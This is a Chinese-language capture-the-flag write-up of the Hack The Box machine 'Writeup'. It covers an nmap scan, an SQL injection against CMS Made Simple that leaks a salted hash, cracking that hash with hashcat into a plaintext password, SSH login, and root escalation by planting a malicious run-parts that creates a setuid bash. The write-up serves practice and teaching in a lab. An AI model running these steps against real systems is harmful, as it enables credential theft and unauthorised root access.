基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV 10.10.10.138

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-12 14:53 CST
Nmap scan report for 10.10.10.138
Host is up (0.070s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.37 seconds

80

根据页面信息提示,禁止自动化扫描,因为会大量400:

Robots.txt给出writeup:

writeup

是CMS Made Simple

CMS Made Simple

搜到相关漏洞:

sql注入

sql注入及hash破解,得到jkr账号密码:

1
2
3
4
5
6
7
8
9
10
11
python sql.py -u http://10.10.10.138/writeup/
[+] Salt for password found: 5a599ef57905
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807

sudo hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9

user flag

得到的账号密码ssh登录,得到user.txt:

提权信息

运行pspy之类的可以发现,当ssh登录时,root权限运行这些:

1
2
3
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
run-parts --lsbsysinit /etc/update-motd.d
/bin/sh /etc/update-motd.d/10-uname

而jkr用户在staff组,可以写入对应路径:

那就可以进行run-parts劫持

提权 & root flag

直接修改run-parts,重新登录触发执行,读取root.txt

1
echo -e '#!/bin/bash\n\ncp /bin/bash /bin/miao\nchmod u+s /bin/miao' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts

参考资料